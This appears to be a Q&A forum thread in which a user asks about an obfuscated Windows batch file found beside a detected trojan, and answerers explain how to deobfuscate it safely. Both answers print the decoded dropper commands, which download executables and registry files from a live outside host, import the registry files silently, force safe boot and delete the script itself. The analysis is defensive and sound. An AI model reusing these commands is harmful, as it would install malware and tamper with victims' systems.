# Found Strange Bat in Windows Directory that's Linked to Detected Trojan, What's it Doing?

Tags: batch-file, trojan

I was running a HitmanPro virus scan, and it detected [b.exe](https://www.virustotal.com/gui/file/5c1814d5d210f8e3ff2a856f8ffe5abed4bb32fa943c1ffe6294f3a7f048d902/detection) which was located in my windows directory. There was another file, b.bat, presumably linked to b.exe, that has very strange code which I've never seen anything like. What is the bat doing?

it starts by settings strange parameters.

```
@echo off 
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::
```

Then uses those to do a long list of strange commands, here's a snippet of that:

```
s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "gdfg5=W"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"
```

Followed by setting things and doing more strange things:

```
set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
%pi%%j%g d%j%l%j%t%j% %yr3%H%lkj6%L%gdg5%%hy%S%vbvc56%FT%gdfg5%A%ssd3%E%hy%%gdg5%%n3%c%pi%%fsf4%s%fsf4%f%a3%%hy%%gdfg5%%n3%nd%fsf4%w%xj66%%hy%Cu%pi%r%j%n%a3%V%j%%pi%s%n3%%fsf4%n%hy%Un%n3%n%xj66%%a3%al%aa2%%hy%%title%%yr3% %a4%f %a4%r%j%g%a6%32
```

[Here's a Pastebin of the full bat code](https://pastebin.com/sH9QtqvM)

What the hell is this thing doing?!?!

Comment: Since `%blah%` expands to the contents of the `blah` environment variable, then `s%j%%a3%` is an obfuscated way to write `set`.  There seem to be several more layers of this.  It's just to make life hard for anyone trying to read the code.

Comment: It is obfuscated code yes, the builder did not do a great job at it, but as you can see, some cannot make out what it does. to fix it, I would firstly disconnect the device from the network entirely, run a decent virus scan on the system or if it was me, format and rebuild!

Comment: It is harmless code, unless run As Administrator, and your machine has those two third party executables here, `\Windows\curl\curl.exe` and here, `\Windows\Wget\bin\wget.exe`. Take a look and see if you have any of these files in `\Windows\ ` too: `at.reg`, `c.exe`, `c.bat`, `c.reg`, `ct.reg`, `d.bat`, `d.exe`, `d.reg`, `e.reg`, `et.reg`, `mgr_f.reg`, `mgr_n.reg`, `mt.reg`, `s.txt` and `usw.reg`, and securely deal them as they're no longer required and shouldn't be there.

Comment: ...you may want to open the `.bat`, `.reg` and `.txt` files to see if they in turn provide a better indication of what exactly was happening, in order for you to possibly fix anything they modified, without resorting to reinstalling your OS too. If you need help with any of those, you would be best advised to post them along side the de-obfuscated `b.bat` content, to a malware dedicated site.

Comment: @Compo Someone managed to dump malicious code into the Windows directory, so we should assume the system is compromised beyond repair. I would not try to salvage this system, it can never be trusted to be clean again.

Comment: @tetsuoii, I would exercise a little more caution at this stage. Based on what I've gleaned, _immature scripting/scripter_, my preference would be to take a look at the rest of the payload before jumping in with both feet. _Unless you're implying that the OP was ill-judged, (running their system with elevated permissions, without UAC, or just clicking buttons without reading the accompanying message)._

Comment: @Tjkline, the text file **[here](https://forospyware.com/uploads/short-url/69HIykrhn6BUTBMBxn1Auy6MX1y.txt)**, looks related. If you take a look at it, it may help you out.

Answer (score 3):

You can apply method used in [my answer to *Strange cmd encrypted script sent by email*](https://superuser.com/a/1317217/376602):

First, from four explicit [`set` commands](https://ss64.com/nt/set.html) at the script beginning, deduce that `s%j%%a3%` evaluates to `set` command so let them all operational (because I see no attempt to rewrite any vital environment variable or other dirty tricks).

To deobfuscate the rest of the code *as far as possible safely* (provided possibly incomplete and slightly messed up), you could *adjust it before running* so that **merely display any potentially dangerous operations instead running them** using [`ECHO` command](https://ss64.com/nt/echo.html) at lines 57 and 199..220 (i.e. in all lines except those with `set …`).

In the **result** from *adjusted* code you can see **mostly dangerous operations** on Windows registry, downloading and running unknown executables, changing [Boot Configuration Data](https://ss64.com/nt/bcdedit.html) etc.:

```
D:\bat\SO\60357115.bat
```

> ```
> for /f "usebackq delims=" %i in ("s.txt") do set %~i
> reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" /f /reg:32
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.bat" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.exe" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.exe" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.bat" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/e.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/usw.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/at.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/ct.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/et.reg" --referer="alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mt.reg" --referer="alpha"
> regedit /s C:\WINDOWS\c.reg
> bcdedit /set "{current}" safeboot "minimal"
> del C:\WINDOWS\b.exe
> del C:\WINDOWS\c.reg
> C:\WINDOWS\curl\curl.exe "http://8858.space/curl/runi.php?subid=_" --referer "alpha"
> C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/y.txt" --referer="alpha"
> del D:\bat\SO\60357115.bat
> ```

Answer (score 1):

The second block expands to 'set' commands, substituting %j% and %a3% for 'e' and 't':

```
set "yui=5"
set "zx3=""
set "gs1=in"
set "gdfg5=W"
set "a5=."
set "c44=a"
```

By now you should realize it's an obfuscation technique that expands to a script it wants to run on your system. Insert **setlocal** at the beginning of the script and disarm harmful lines with **echo** to extract the meaning:

```
for /f "usebackq delims=" %i in ("s.txt") do set %~i
set "title="
set "sub="
set "pos="
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" /f /reg:32
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.exe" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.bat" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/c.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/e.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/d.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/usw.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/at.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/ct.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/et.reg" --referer="alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/mt.reg" --referer="alpha"
regedit /s C:\WINDOWS\c.reg
bcdedit /set "{current}" safeboot "minimal"
del C:\WINDOWS\b.exe
del C:\WINDOWS\c.reg
C:\WINDOWS\curl\curl.exe "http://8858.space/curl/runi.php?subid=_" --referer "alpha"
C:\WINDOWS\Wget\bin\wget.exe -c -P "C:\WINDOWS" "http://8858.space/rs/st/y.txt" --referer="alpha"
del b.bat
```

Some meaning is lost, like the *title*, *sub* and *pos* variables, probably defined in s.txt -- but what it does is quite clear: It modifies your registry and boot configuration, downloads more malware and self deletes. If this ran on my computer I would backup my stuff, format and reinstall.